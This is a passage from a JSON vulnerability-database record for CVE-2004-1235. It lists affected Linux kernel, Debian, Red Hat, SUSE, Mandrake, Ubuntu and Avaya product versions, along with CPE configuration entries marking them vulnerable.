        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -ow1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.24"
      },
      {
        "model": "kernel -pre9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel -ow2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.23"
      },
      {
        "model": "kernel pre7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel -pre6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel pre-8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel pre-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18x86"
      },
      {
        "model": "kernel .0-test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test12",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel .0-test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "3.0"
      },
      {
        "model": "s8710 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8710 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8700 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8700 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8500 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "s8300 r2.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "network routing",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "modular messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0"
      },
      {
        "model": "modular messaging",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "mn100",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "intuity lx",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "12190"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2005-000008"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-1235"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200504-062"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:avaya:network_routing:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:converged_communications_server:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test11:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.15:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.22:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.26:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:avaya:mn100:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test10:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.8:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.8:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:amd64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:4.0:*:advanced_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:4.0:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:linux:7.3:*:i386:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:linux:9.0:*:i386:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:ubuntu:ubuntu_linux:4.1:*:ia64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.13:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.14:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24_ow1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.28:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.29:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.7:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:amd64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:workstation:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:avaya:modular_messaging_message_storage_server:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:avaya:modular_messaging_message_storage_server:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.11:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.12:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:x86:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre8:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.21:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23_ow2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.6:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6_test9_cvs:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:3.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:advanced_servers:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux_desktop:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8710:r2.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:avaya:s8710:r2.0.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test12:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.0:test2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.17:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.18:pre7:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.19:pre6:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.23:pre9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.27:pre2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.4.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test11:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.0:test9:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.1:rc1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.8:rc3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.9:2.6.20:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:x86_64:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:4.0:*:workstation:*:*:*:*:*",
